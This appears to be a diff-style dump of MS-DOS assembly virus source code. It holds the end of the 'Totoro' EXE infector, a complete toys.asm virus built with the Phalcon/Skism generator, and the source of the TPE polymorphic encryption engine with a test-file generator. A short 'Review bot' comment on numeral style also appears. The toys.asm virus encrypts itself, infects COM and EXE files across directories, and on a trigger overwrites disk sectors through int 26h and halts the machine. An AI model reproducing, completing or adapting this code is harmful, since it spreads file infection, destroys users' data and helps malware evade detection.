mov cx,10h
|
||||
mul cx
|
||||
pop bx cx
|
||||
sub bx,ax
|
||||
sbb cx,dx
|
||||
xchg ax,bx
|
||||
xchg dx,cx
|
||||
mov cx,10h
|
||||
div cx
|
||||
mov cs:[Init_CS],ax
|
||||
mov cs:[Init_SS],ax
|
||||
mov cs:[Init_SP],700h
|
||||
mov cs:[Init_IP],offset EXE_Entry_Point-100
|
||||
pop ax dx
|
||||
push dx ax
|
||||
add ax,604h
|
||||
adc dx,0
|
||||
mov cx,200h
|
||||
div cx
|
||||
mov cs:Last_Page_Len,dx
|
||||
or dx,dx
|
||||
jz Rewrite_Header
|
||||
inc ax
|
||||
|
||||
Rewrite_Header:
|
||||
mov cs:[EXE_Size],ax
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
mov bx,cs:[File_Handle]
|
||||
mov ax,4200h
|
||||
int 21h ;Move back to beginning of file
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,offset EXE_Sig
|
||||
mov cx,1Ch
|
||||
mov ah,40h
|
||||
int 21h ;Write EXE header back to file
|
||||
|
||||
pop dx
|
||||
pop cx
|
||||
jc Close_File
|
||||
mov ax,4200h
|
||||
int 21h ;Go to end of host.
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,100
|
||||
mov cx,600h
|
||||
mov ah,40h
|
||||
int 21h ;Write Virus
|
||||
jc Close_File
|
||||
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
mov ax,4202h
|
||||
int 21h ;Go to end of file.
|
||||
|
||||
mov dx,offset Marker
|
||||
mov cx,4
|
||||
mov ah,40h
|
||||
int 21h ;Write marker byte.
|
||||
|
||||
jmp short Close_File
|
||||
nop
|
||||
Release_Mem:
|
||||
mov es,cs:Mem_Seg
|
||||
mov ah,49h
|
||||
int 21h ;Release Memory
|
||||
|
||||
Close_File:
|
||||
mov ah,3Eh
|
||||
mov bx,cs:[File_Handle]
|
||||
int 21h ;Close file.
|
||||
|
||||
Reset_Attribs:
|
||||
mov ds,cs:File_Name_Seg
|
||||
mov dx,cs:File_Name_Off
|
||||
mov cx,cs:File_Attribs
|
||||
mov ax,4301h
|
||||
int 21h ;Reset File attributes
|
||||
|
||||
Clean_Up:
|
||||
mov ds,cs:[CS_24] ;Restore Critical Error
|
||||
mov dx,cs:[IP_24]
|
||||
mov ax,2524h
|
||||
int 21h
|
||||
|
||||
pop di si dx cx bx ax ds es
|
||||
retn
|
||||
|
||||
|
||||
Int_24: ;Critical Error Handler
|
||||
xor ax,ax
|
||||
iret
|
||||
|
||||
Int_08: ;Timer Click Handler
|
||||
pushf
|
||||
inc cs:[Activation_Counter]
|
||||
cmp cs:[Activation_Counter],0CCCh
|
||||
jne Go_Int_08
|
||||
mov cs:[Activation_Counter],0 ;Reset Counter
|
||||
push ds es si di ax bx cx dx
|
||||
call Get_Mode
|
||||
call Scroll_Area
|
||||
call Print_Message
|
||||
pop dx cx bx ax di si es ds
|
||||
Go_Int_08:
|
||||
popf ; Pop flags
|
||||
db 0EA
|
||||
IP_08 dw 003Ch
|
||||
CS_08 dw 0D80h
|
||||
|
||||
Screen_Width dw 0
|
||||
Activation_Counter dw 1E0h
|
||||
|
||||
Get_Mode:
|
||||
mov ah,0Fh
|
||||
int 10h ;Get Video Mode
|
||||
|
||||
mov bx,0B000h ;Mode 7 Text Video Memory
|
||||
mov es,bx
|
||||
cmp al,7
|
||||
je In_Mode_7
|
||||
mov bx,0B800h ;Regular Text Video Memory
|
||||
In_Mode_7:
|
||||
mov es,bx
|
||||
mov ds,bx
|
||||
mov cs:[Screen_Width],4Fh
|
||||
|
||||
Setup_Screen:
|
||||
mov cx,19h
|
||||
mov bx,0
|
||||
Clear_Screen:
|
||||
push cx
|
||||
call Scroll_Line
|
||||
add bx,0A0h
|
||||
pop cx
|
||||
loop Clear_Screen
|
||||
|
||||
dec cs:[Screen_Width]
|
||||
jnz Setup_Screen
|
||||
retn
|
||||
|
||||
Scroll_Line: ;This subroutine clears the
|
||||
mov di,bx ;screen by scrolling the text
|
||||
mov si,bx ;straight off of the left
|
||||
add si,2 ;side.
|
||||
mov cx,cs:[Screen_Width]
|
||||
|
||||
Scroll_Sideways:
|
||||
lodsb
|
||||
stosb
|
||||
inc si
|
||||
inc di
|
||||
loop Scroll_Sideways
|
||||
retn
|
||||
|
||||
Print_Message:
|
||||
xor bx,bx
|
||||
push cs
|
||||
pop ds
|
||||
db 8dh,36h,18h,06 ;lea si,cs:[Totoro_Design]
|
||||
mov ah,0Eh
|
||||
Print_Loop:
|
||||
lodsb
|
||||
int 10h ;Write Char in Teletype mode
|
||||
cmp byte ptr [si],24h ;is it a '$'?
|
||||
jne Print_Loop ;Nope, continue writing
|
||||
retn
|
||||
|
||||
Scroll_Area:
|
||||
xor bx,bx ;Video Page 0
|
||||
mov ah,3
|
||||
int 10h ;Get Cursor info
|
||||
|
||||
push dx ;Push Cursor Location (DX)
|
||||
mov ah,6
|
||||
mov bh,7
|
||||
mov al,18h
|
||||
xor cx,cx
|
||||
mov dh,18h
|
||||
mov dl,4Fh
|
||||
int 10h ;Scroll up (clear screen)
|
||||
|
||||
mov ah,2
|
||||
pop dx
|
||||
sub dh,2
|
||||
xor bx,bx
|
||||
int 10h ;Reset Cursor
|
||||
|
||||
xor bx,bx
|
||||
xor dx,dx
|
||||
mov ah,2
|
||||
int 10h ;Set Cursor for printing.
|
||||
retn
|
||||
|
||||
Totoro_Design:
|
||||
db ' ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ·',0Dh, 0Ah
|
||||
db ' º Totoro Dragon º',0Dh, 0Ah
|
||||
db ' ºHello! I am TOTORO CATº',0Dh, 0Ah
|
||||
db ' º Written by Y.T.J.C.T º',0Dh, 0Ah
|
||||
db ' º in Ping Tung. TAIWAN º',0Dh, 0Ah
|
||||
db ' º Don''t Worry,be Happy º',0Dh, 0Ah
|
||||
db ' ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ$'
|
||||
Marker db 'YTIT'
|
||||
db 28 dup (0)
|
||||
|
||||
;***************************************************************************
|
||||
;*End of virus. The bytes below this line are the infected program and the *
|
||||
;* viruses' identification bytes. *
|
||||
;***************************************************************************
|
||||
|
||||
Host_Program:
|
||||
mov ax,4c00
|
||||
int 21
|
||||
|
||||
Infected_Mark db 'YTIT'
|
||||
end start
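Review bot: The listing sets `.radix 16` near the top of this section but then mixes bare numerals with `h`-suffixed ones, so a reader can misread `mov si,100`, `mov dx,100`, `CS_21 dw 0011`, `db 0ea` and the `mov ax,4c00` / `int 21` pair in Host_Program as decimal when the directive makes them hexadecimal. A comment on the directive itself would prevent that misreading, e.g. `.radix 16 ;bare numerals below are hex: 100 == 100h`, and the mixed style is worth flattening to one convention for anyone reading the disassembly. The multi-operand `push es ds ax bx cx dx si di` / `pop ax ax` forms are a TASM extension, not standard MASM syntax, which is another point a reader comparing against MASM conventions should be told in the header comment.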
@ -0,0 +1,381 @@
; toys.asm : Unknown by Unknown
|
||||
; Created wik the Phalcon/Skism Mass-Produced Code Generator
|
||||
; from the configuration file skeleton.cfg
|
||||
|
||||
.model tiny ; Handy directive
|
||||
.code ; Virus code segment
|
||||
org 100h ; COM file starting IP
|
||||
|
||||
id = 'FZ' ; ID word for EXE infections
|
||||
entry_point: db 0e9h,0,0 ; jmp decrypt
|
||||
|
||||
decrypt: loop decrypt ; handles encryption and decryption
|
||||
patch_startencrypt:
|
||||
mov si,offset startencrypt ; start of decryption
|
||||
mov dx,(offset heap - offset startencrypt)/2 ; iterations
|
||||
decrypt_loop:
|
||||
db 2eh,81h,34h ; xor word ptr cs:[si], xxxx
|
||||
decrypt_value dw 0 ; initialised at zero for null effect
|
||||
inc si ; calculate new decryption location
|
||||
inc si
|
||||
dec dx ; If we are not done, then
|
||||
jnz decrypt_loop ; decrypt mo'
|
||||
startencrypt:
|
||||
call next ; calculate delta offset
|
||||
next: pop bp ; bp = IP next
|
||||
sub bp,offset next ; bp = delta offset
|
||||
|
||||
cmp sp,id ; COM or EXE?
|
||||
je restoreEXE
|
||||
restoreCOM:
|
||||
lea si,[bp+save3]
|
||||
mov di,100h
|
||||
push di ; For later return
|
||||
movsb
|
||||
jmp short restoreEXIT
|
||||
restoreEXE:
|
||||
push ds
|
||||
push es
|
||||
push cs ; DS = CS
|
||||
pop ds
|
||||
push cs ; ES = CS
|
||||
pop es
|
||||
lea si,[bp+jmpsave2]
|
||||
lea di,[bp+jmpsave]
|
||||
movsw
|
||||
movsw
|
||||
movsw
|
||||
restoreEXIT:
|
||||
movsw
|
||||
|
||||
mov byte ptr [bp+numinfec],2 ; reset infection counter
|
||||
|
||||
mov ah,1Ah ; Set new DTA
|
||||
lea dx,[bp+newDTA] ; new DTA @ DS:DX
|
||||
int 21h
|
||||
|
||||
mov ah,47h ; Get current directory
|
||||
mov dl,0 ; Current drive
|
||||
lea si,[bp+origdir] ; DS:SI->buffer
|
||||
int 21h
|
||||
mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR
|
||||
|
||||
mov ax,3524h ; Get int 24 handler
|
||||
int 21h ; to ES:BX
|
||||
mov word ptr [bp+oldint24],bx; Save it
|
||||
mov word ptr [bp+oldint24+2],es
|
||||
mov ah,25h ; Set new int 24 handler
|
||||
lea dx,[bp+offset int24] ; DS:DX->new handler
|
||||
int 21h
|
||||
push cs ; Restore ES
|
||||
pop es ; 'cuz it was changed
|
||||
|
||||
dir_scan: ; "dot dot" traversal
|
||||
lea dx,[bp+exe_mask]
|
||||
call infect_mask
|
||||
lea dx,[bp+com_mask]
|
||||
call infect_mask
|
||||
mov ah,3bh ; change directory
|
||||
lea dx,[bp+dot_dot] ; "cd .."
|
||||
int 21h
|
||||
jnc dir_scan ; go back for mo!
|
||||
|
||||
done_infections:
|
||||
mov ah,2ah ; Get current date
|
||||
int 21h
|
||||
cmp dh,6 ; Check month
|
||||
cmp dl,19 ; Check date
|
||||
jb exit_virus
|
||||
cmp al,-1 ; Check date of week
|
||||
jz activate
|
||||
|
||||
mov ah,2ch ; Get current time
|
||||
int 21h
|
||||
cmp ch,18 ; Check the hour
|
||||
jnz exit_virus
|
||||
cmp cl,-1 ; Check the minute
|
||||
jnz exit_virus
|
||||
cmp dh,-1 ; Check the seconds
|
||||
jnz exit_virus
|
||||
exit_virus:
|
||||
mov ax,2524h ; Restore int 24 handler
|
||||
lds dx,[bp+offset oldint24] ; to original
|
||||
int 21h
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
mov ah,3bh ; change directory
|
||||
lea dx,[bp+origdir-1] ; original directory
|
||||
int 21h
|
||||
|
||||
mov ah,1ah ; restore DTA to default
|
||||
mov dx,80h ; DTA in PSP
|
||||
cmp sp,id-4 ; EXE or COM?
|
||||
jz returnEXE
|
||||
returnCOM:
|
||||
int 21h
|
||||
retn ; 100h is on stack
|
||||
returnEXE:
|
||||
pop es
|
||||
pop ds
|
||||
int 21h
|
||||
mov ax,es ; AX = PSP segment
|
||||
add ax,10h ; Adjust for PSP
|
||||
add word ptr cs:[bp+jmpsave+2],ax
|
||||
add ax,word ptr cs:[bp+stacksave+2]
|
||||
cli ; Clear intrpts for stack manipulation
|
||||
mov sp,word ptr cs:[bp+stacksave]
|
||||
mov ss,ax
|
||||
sti
|
||||
db 0eah ; jmp ssss:oooo
|
||||
jmpsave dd ? ; Original CS:IP
|
||||
stacksave dd ? ; Original SS:SP
|
||||
jmpsave2 db ? ; Actually four bytes
|
||||
save3 db 0cdh,20h,0 ; First 3 bytes of COM file
|
||||
stacksave2 dd ?
|
||||
|
||||
activate: mov si,offset data00 ; SI points to data
|
||||
mov ah,0Eh ; BIOS display char. function
|
||||
display_loop: lodsb ; Load the next char. into AL
|
||||
or al,al ; Is the character a null?
|
||||
je disp_strnend ; If it is, exit
|
||||
int 010h ; BIOS video interrupt
|
||||
jmp short display_loop ; Do the next character
|
||||
disp_strnend:
|
||||
|
||||
mov ax,0002h ; First argument is 2
|
||||
mov cx,00C8h ; Second argument is 200
|
||||
cli ; Disable interrupts (no Ctrl-C)
|
||||
cwd ; Clear DX (start with sector 0)
|
||||
int 026h ; DOS absolute write interrupt
|
||||
sti ; Restore interrupts
|
||||
|
||||
cli ; Clear the interrupt flag
|
||||
hlt ; HaLT the computer
|
||||
jmp short $ ; Just to make sure
|
||||
|
||||
jmp exit_virus
|
||||
|
||||
data00 db 10,13,"All my toys are broken",13,10
|
||||
db "And so am I inside.",13,10
|
||||
db "The carnival has closed",13,10
|
||||
db "Years ago...",13,10,0
|
||||
|
||||
;creator db '[MPC]',0 ; Mass Produced Code Generator
|
||||
|
||||
infect_mask:
|
||||
mov ah,4eh ; find first file
|
||||
mov cx,7 ; any attribute
|
||||
findfirstnext:
|
||||
int 21h ; DS:DX points to mask
|
||||
jc exit_infect_mask ; No mo files found
|
||||
|
||||
mov al,0h ; Open read only
|
||||
call open
|
||||
|
||||
mov ah,3fh ; Read file to buffer
|
||||
lea dx,[bp+buffer] ; @ DS:DX
|
||||
mov cx,1Ah ; 1Ah bytes
|
||||
int 21h
|
||||
|
||||
mov ah,3eh ; Close file
|
||||
int 21h
|
||||
|
||||
cmp word ptr [bp+buffer],'ZM'; EXE?
|
||||
jz checkEXE ; Why yes, yes it is!
|
||||
checkCOM:
|
||||
mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA
|
||||
cmp ax,50000 ; Is it too large?
|
||||
ja find_next
|
||||
|
||||
mov bx,word ptr [bp+buffer+1]; get jmp location
|
||||
add bx,heap-decrypt+3 ; Adjust for virus size
|
||||
cmp ax,bx
|
||||
je find_next ; already infected
|
||||
jmp infect_com
|
||||
checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected?
|
||||
jnz infect_exe
|
||||
find_next:
|
||||
mov ah,4fh ; find next file
|
||||
jmp short findfirstnext
|
||||
exit_infect_mask: ret
|
||||
|
||||
infect_exe:
|
||||
les ax, dword ptr [bp+buffer+14h] ; Save old entry point
|
||||
mov word ptr [bp+jmpsave2], ax
|
||||
mov word ptr [bp+jmpsave2+2], es
|
||||
|
||||
les ax, dword ptr [bp+buffer+0Eh] ; Save old stack
|
||||
mov word ptr [bp+stacksave2], es
|
||||
mov word ptr [bp+stacksave2+2], ax
|
||||
|
||||
mov ax, word ptr [bp+buffer + 8] ; Get header size
|
||||
mov cl, 4 ; convert to bytes
|
||||
shl ax, cl
|
||||
xchg ax, bx
|
||||
|
||||
les ax, [bp+offset newDTA+26]; Get file size
|
||||
mov dx, es ; to DX:AX
|
||||
push ax
|
||||
push dx
|
||||
|
||||
sub ax, bx ; Subtract header size from
|
||||
sbb dx, 0 ; file size
|
||||
|
||||
mov cx, 10h ; Convert to segment:offset
|
||||
div cx ; form
|
||||
|
||||
mov word ptr [bp+buffer+14h], dx ; New entry point
|
||||
mov word ptr [bp+buffer+16h], ax
|
||||
|
||||
mov word ptr [bp+buffer+0Eh], ax ; and stack
|
||||
mov word ptr [bp+buffer+10h], id
|
||||
|
||||
pop dx ; get file length
|
||||
pop ax
|
||||
|
||||
add ax, heap-decrypt ; add virus size
|
||||
adc dx, 0
|
||||
|
||||
mov cl, 9
|
||||
push ax
|
||||
shr ax, cl
|
||||
ror dx, cl
|
||||
stc
|
||||
adc dx, ax
|
||||
pop ax
|
||||
and ah, 1 ; mod 512
|
||||
|
||||
mov word ptr [bp+buffer+4], dx ; new file size
|
||||
mov word ptr [bp+buffer+2], ax
|
||||
|
||||
push cs ; restore ES
|
||||
pop es
|
||||
|
||||
push word ptr [bp+buffer+14h] ; needed later
|
||||
mov cx, 1ah
|
||||
jmp short finishinfection
|
||||
infect_com: ; ax = filesize
|
||||
mov cx,3
|
||||
sub ax,cx
|
||||
lea si,[bp+offset buffer]
|
||||
lea di,[bp+offset save3]
|
||||
movsw
|
||||
movsb
|
||||
mov byte ptr [si-3],0e9h
|
||||
mov word ptr [si-2],ax
|
||||
add ax,103h
|
||||
push ax ; needed later
|
||||
finishinfection:
|
||||
push cx ; Save # bytes to write
|
||||
xor cx,cx ; Clear attributes
|
||||
call attributes ; Set file attributes
|
||||
|
||||
mov al,2
|
||||
call open
|
||||
|
||||
mov ah,40h ; Write to file
|
||||
lea dx,[bp+buffer] ; Write from buffer
|
||||
pop cx ; cx bytes
|
||||
int 21h
|
||||
|
||||
mov ax,4202h ; Move file pointer
|
||||
xor cx,cx ; to end of file
|
||||
cwd ; xor dx,dx
|
||||
int 21h
|
||||
|
||||
mov ah,2ch ; Get current time
|
||||
int 21h ; dh=sec,dl=1/100 sec
|
||||
mov [bp+decrypt_value],dx ; Set new encryption value
|
||||
lea di,[bp+code_store]
|
||||
mov ax,5355h ; push bp,push bx
|
||||
stosw
|
||||
lea si,[bp+decrypt] ; Copy encryption function
|
||||
mov cx,startencrypt-decrypt ; Bytes to move
|
||||
push si ; Save for later use
|
||||
push cx
|
||||
rep movsb
|
||||
|
||||
lea si,[bp+write] ; Copy writing function
|
||||
mov cx,endwrite-write ; Bytes to move
|
||||
rep movsb
|
||||
pop cx
|
||||
pop si
|
||||
pop dx ; Entry point of virus
|
||||
push di
|
||||
push si
|
||||
push cx
|
||||
rep movsb ; Copy decryption function
|
||||
mov ax,5b5dh ; pop bx,pop bp
|
||||
stosw
|
||||
mov al,0c3h ; retn
|
||||
stosb
|
||||
|
||||
add dx,offset startencrypt - offset decrypt ; Calculate new
|
||||
mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of
|
||||
call code_store ; decryption
|
||||
pop cx
|
||||
pop di
|
||||
pop si
|
||||
rep movsb ; Restore decryption function
|
||||
|
||||
mov ax,5701h ; Restore creation date/time
|
||||
mov cx,word ptr [bp+newDTA+16h] ; time
|
||||
mov dx,word ptr [bp+newDTA+18h] ; date
|
||||
int 21h
|
||||
|
||||
mov ah,3eh ; Close file
|
||||
int 21h
|
||||
|
||||
mov ch,0
|
||||
mov cl,byte ptr [bp+newDTA+15h] ; Restore original
|
||||
call attributes ; attributes
|
||||
|
||||
dec byte ptr [bp+numinfec] ; One mo infection
|
||||
jnz mo_infections ; Not enough
|
||||
pop ax ; remove call from stack
|
||||
jmp done_infections
|
||||
mo_infections: jmp find_next
|
||||
|
||||
open:
|
||||
mov ah,3dh
|
||||
lea dx,[bp+newDTA+30] ; filename in DTA
|
||||
int 21h
|
||||
xchg ax,bx
|
||||
ret
|
||||
|
||||
attributes:
|
||||
mov ax,4301h ; Set attributes to cx
|
||||
lea dx,[bp+newDTA+30] ; filename in DTA
|
||||
int 21h
|
||||
ret
|
||||
|
||||
write:
|
||||
pop bx ; Restore file handle
|
||||
pop bp ; Restore relativeness
|
||||
mov ah,40h ; Write to file
|
||||
lea dx,[bp+decrypt] ; Concatenate virus
|
||||
mov cx,heap-decrypt ; # bytes to write
|
||||
int 21h
|
||||
push bx
|
||||
push bp
|
||||
endwrite:
|
||||
|
||||
int24: ; New int 24h (error) handler
|
||||
mov al,3 ; Fail call
|
||||
iret ; Return control
|
||||
|
||||
exe_mask db '*.exe',0
|
||||
com_mask db '*.com',0
|
||||
dot_dot db '..',0
|
||||
heap: ; Variables not in code
|
||||
; The following code is the buffer for the write function
|
||||
code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)
|
||||
oldint24 dd ? ; Storage for old int 24h handler
|
||||
backslash db ?
|
||||
origdir db 64 dup (?) ; Current directory buffer
|
||||
newDTA db 43 dup (?) ; Temporary DTA
|
||||
numinfec db ? ; Infections this run
|
||||
buffer db 1ah dup (?) ; read buffer
|
||||
endheap: ; End of virus
|
||||
end entry_point
@ -0,0 +1,101 @@
;----------------------------------------------------------------------------
|
||||
; TPE-GEN - This program generates 50 TPE encrypted test files
|
||||
;
|
||||
; This source can be compiled with MASM 5.0 or TASM 2.01
|
||||
; (and perhaps others too, but this is not tested.)
|
||||
;----------------------------------------------------------------------------
|
||||
|
||||
.model tiny
|
||||
.RADIX 16
|
||||
|
||||
.code
|
||||
|
||||
extrn crypt:near ;external routines in engine
|
||||
extrn rnd_get:near
|
||||
extrn rnd_init:near
|
||||
|
||||
|
||||
org 0100
|
||||
|
||||
begin: call rnd_init ;init. random number generator
|
||||
|
||||
mov dx,offset starttxt ;print message
|
||||
mov ah,09
|
||||
int 21
|
||||
|
||||
mov cx,50d ;repeat 50 times
|
||||
lop: push cx
|
||||
|
||||
mov ah,3C ;create a new file
|
||||
mov dx,offset filename
|
||||
mov cx,0020
|
||||
int 21
|
||||
xchg ax,bx
|
||||
|
||||
push ds
|
||||
push es
|
||||
push bx
|
||||
|
||||
mov ax,cs ;input parameters for engine
|
||||
mov ds,ax
|
||||
add ax,0400
|
||||
mov es,ax ;ES = DS + 400h
|
||||
xor si,si ;code will be right after decr.
|
||||
mov dx,offset hello ;this will be encrtypted
|
||||
mov cx,100d ;length of code to encrypt
|
||||
mov bp,0100 ;decryptor will start at 100h
|
||||
call rnd_get ;AX register will be random
|
||||
|
||||
call crypt ;call the engine
|
||||
|
||||
pop bx ;write crypted file
|
||||
mov ah,40
|
||||
int 21
|
||||
|
||||
mov ah,3E ;close the file
|
||||
int 21
|
||||
|
||||
pop es
|
||||
pop ds
|
||||
|
||||
mov di,offset filename ;adjust name for next file
|
||||
mov bx,7 ; (increment number)
|
||||
incnum: inc byte ptr ds:[bx+di]
|
||||
cmp byte ptr ds:[bx+di],'9'
|
||||
jbe numok
|
||||
mov byte ptr ds:[bx+di],'0'
|
||||
dec bx
|
||||
jnz incnum
|
||||
|
||||
numok: pop cx ;do it again...
|
||||
loop lop
|
||||
|
||||
exit: int 20
|
||||
|
||||
|
||||
;----------------------------------------------------------------------------
|
||||
; Text and data
|
||||
;----------------------------------------------------------------------------
|
||||
|
||||
starttxt db 'TPE-GEN - Generates 50 TPE encrypted test files.'
|
||||
db 0Dh, 0Ah, '$'
|
||||
|
||||
filename db '00000000.COM',0
|
||||
|
||||
|
||||
;----------------------------------------------------------------------------
|
||||
; The small test file that will be encrypted
|
||||
;----------------------------------------------------------------------------
|
||||
|
||||
hello: call next ;get relative offset
|
||||
next: pop dx
|
||||
add dx,10d ;find begin of message
|
||||
mov ah,09 ;print message
|
||||
int 21
|
||||
int 20
|
||||
|
||||
db 'Hello, world!', 0Dh, 0A, '$'
|
||||
db (100d) dup (90)
|
||||
|
||||
end begin
@ -0,0 +1,990 @@
.radix 16
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
;
|
||||
; TPE v1.2 Source Code
|
||||
; --------------------
|
||||
;
|
||||
; Extracted from Coffee Shop virus by: Lucifer Messiah -- ANARKICK SYSTEMS
|
||||
;
|
||||
;-----------------------------------------------------------------------------
|
||||
|
||||
.model tiny
|
||||
.code
|
||||
|
||||
public rnd_init
|
||||
public rnd_get
|
||||
public crypt
|
||||
public tpe_bottom
|
||||
public tpe_top
|
||||
|
||||
;****************************************************************************
|
||||
;* Data area for engine
|
||||
;****************************************************************************
|
||||
|
||||
org 0e0
|
||||
TPE12:
|
||||
|
||||
add_val dw 0
|
||||
xor_val dw 0
|
||||
xor_offset dw 0
|
||||
where_len dw 0
|
||||
where_len2 dw 0
|
||||
flags db 0
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* Begin of virus, installation in memory
|
||||
;****************************************************************************
|
||||
|
||||
org 0100
|
||||
|
||||
;****************************************************************************
|
||||
;* Insert virus code here, or compile and link to virus
|
||||
;****************************************************************************
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;*
|
||||
;* Encryption Engine
|
||||
;*
|
||||
;*
|
||||
;* Input: ES work segment
|
||||
;* DS:DX code to encrypt
|
||||
;* BP what will be start of decryptor
|
||||
;* SI what will be distance between decryptor and code
|
||||
;* CX length of code
|
||||
;* AX flags: bit 0: DS will not be equal to CS
|
||||
;* bit 1: insert random instructions
|
||||
;* bit 2: put junk before decryptor
|
||||
;* bit 3: preserve AX with decryptor
|
||||
;*
|
||||
;* Output: ES: work segment (preserved)
|
||||
;* DS:DX decryptor + encrypted code
|
||||
;* BP what will be start of decryptor (preserved)
|
||||
;* DI length of decryptor / offset of encrypted code
|
||||
;* CX length of decryptor + encrypted code
|
||||
;* AX length of encrypted code
|
||||
;* (other registers may be trashed)
|
||||
;*
|
||||
;****************************************************************************
|
||||
|
||||
tpe_top equ $
|
||||
db '[ MK / Trident ]'
|
||||
|
||||
crypt:
|
||||
xor di,di ;di = start of decryptor
|
||||
push dx ;save offset of code
|
||||
push si ;save future offset of code
|
||||
|
||||
mov byte ptr ds:[flags],al ;save flags
|
||||
test al,8 ;push AX?
|
||||
jz no_push
|
||||
mov al,50
|
||||
stosb
|
||||
|
||||
no_push: call rnd_get ;add a few bytes to cx
|
||||
and ax,1F
|
||||
add cx,ax
|
||||
push cx ;save length of code
|
||||
|
||||
call rnd_get ;get random flags
|
||||
xchg ax,bx
|
||||
;BX flags:
|
||||
|
||||
;0,1 how to encrypt
|
||||
;2,3 which register for encryption
|
||||
;4 use byte or word for encrypt
|
||||
;5 MOV AL, MOV AH or MOV AX
|
||||
;6 MOV CL, MOV CH or MOV CX
|
||||
;7 AX or DX
|
||||
|
||||
;8 count up or down
|
||||
;9 ADD/SUB/INC/DEC or CMPSW/SCASW
|
||||
;A ADD/SUB or INC/DEC
|
||||
; CMPSW or SCASW
|
||||
;B offset in XOR instruction?
|
||||
;C LOOPNZ or LOOP
|
||||
; SUB CX or DEC CX
|
||||
;D carry with crypt ADD/SUB
|
||||
;E carry with inc ADD/SUB
|
||||
;F XOR instruction value or AX/DX
|
||||
|
||||
random: call rnd_get ;get random encryption value
|
||||
or al,al
|
||||
jz random ;again if 0
|
||||
mov ds:[xor_val],ax
|
||||
|
||||
call do_junk ;insert random instructions
|
||||
|
||||
pop cx
|
||||
|
||||
mov ax,0111 ;make flags to remember which
|
||||
test bl,20 ; MOV instructions are used
|
||||
jnz z0
|
||||
xor al,07
|
||||
z0: test bl,0C
|
||||
jnz z1
|
||||
xor al,70
|
||||
z1: test bl,40
|
||||
jnz z2
|
||||
xor ah,7
|
||||
z2: test bl,10
|
||||
jnz z3
|
||||
and al,73
|
||||
z3: test bh,80
|
||||
jnz z4
|
||||
and al,70
|
||||
|
||||
z4: mov dx,ax
|
||||
mov_lup: call rnd_get ;put MOV instructions in
|
||||
and ax,000F ; a random order
|
||||
cmp al,0A
|
||||
ja mov_lup
|
||||
|
||||
mov si,ax
|
||||
push cx ;test if MOV already done
|
||||
xchg ax,cx
|
||||
mov ax,1
|
||||
shl ax,cl
|
||||
mov cx,ax
|
||||
and cx,dx
|
||||
pop cx
|
||||
jz mov_lup
|
||||
xor dx,ax ;remember which MOV done
|
||||
|
||||
push dx
|
||||
call do_mov ;insert MOV instruction
|
||||
call do_nop ;insert a random NOP
|
||||
pop dx
|
||||
|
||||
or dx,dx ;all MOVs done?
|
||||
jnz mov_lup
|
||||
|
||||
push di ;save start of decryptor loop
|
||||
|
||||
call do_add_ax ;add a value to AX in loop?
|
||||
call do_nop
|
||||
test bh,20 ;carry with ADD/SUB ?
|
||||
jz no_clc
|
||||
mov al,0F8
|
||||
stosb
|
||||
no_clc: mov word ptr ds:[xor_offset],0
|
||||
call do_xor ;place all loop instructions
|
||||
call do_nop
|
||||
call do_add
|
||||
|
||||
pop dx ;get start of decryptor loop
|
||||
|
||||
call do_loop
|
||||
|
||||
test byte ptr ds:[flags],8 ;insert POP AX ?
|
||||
jz no_pop
|
||||
mov al,58
|
||||
stosb
|
||||
|
||||
no_pop: xor ax,ax ;calculate loop offset
|
||||
test bh,1 ;up or down?
|
||||
jz v1
|
||||
mov ax,cx
|
||||
dec ax
|
||||
test bl,10 ;encrypt with byte or word?
|
||||
jz v1
|
||||
and al,0FE
|
||||
v1: add ax,di
|
||||
add ax,bp
|
||||
pop si
|
||||
add ax,si
|
||||
sub ax,word ptr ds:[xor_offset]
|
||||
mov si,word ptr ds:[where_len]
|
||||
test bl,0C ;are BL,BH used for encryption?
|
||||
jnz v2
|
||||
mov byte ptr es:[si],al
|
||||
mov si,word ptr ds:[where_len2]
|
||||
mov byte ptr es:[si],ah
|
||||
jmp short v3
|
||||
v2: mov word ptr es:[si],ax
|
||||
|
||||
v3: mov dx,word ptr ds:[xor_val] ;encryption value
|
||||
|
||||
pop si ;ds:si = start of code
|
||||
|
||||
push di ;save ptr to encrypted code
|
||||
push cx ;save length of encrypted code
|
||||
|
||||
test bl,10 ;byte or word?
|
||||
jz blup
|
||||
|
||||
inc cx ;cx = # of crypts (words)
|
||||
shr cx,1
|
||||
|
||||
lup: lodsw ;encrypt code (words)
|
||||
call do_encrypt
|
||||
stosw
|
||||
loop lup
|
||||
jmp short klaar
|
||||
|
||||
|
||||
blup: lodsb ;encrypt code (bytes)
|
||||
xor dh,dh
|
||||
call do_encrypt
|
||||
stosb
|
||||
loop blup
|
||||
|
||||
klaar: mov cx,di ;cx = length decryptpr + code
|
||||
pop ax ;ax = length of decrypted code
|
||||
pop di ;di = offset encrypted code
|
||||
xor dx,dx ;ds:dx = decryptor + cr. code
|
||||
push es
|
||||
pop ds
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* encrypt the code
|
||||
;****************************************************************************
|
||||
|
||||
do_encrypt: add dx,word ptr ds:[add_val]
|
||||
test bl,2
|
||||
jnz lup1
|
||||
xor ax,dx
|
||||
ret
|
||||
|
||||
lup1: test bl,1
|
||||
jnz lup2
|
||||
sub ax,dx
|
||||
ret
|
||||
|
||||
lup2: add ax,dx
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* generate mov reg,xxxx
|
||||
;****************************************************************************
|
||||
|
||||
do_mov: mov dx,si
|
||||
mov al,byte ptr ds:[si+mov_byte]
|
||||
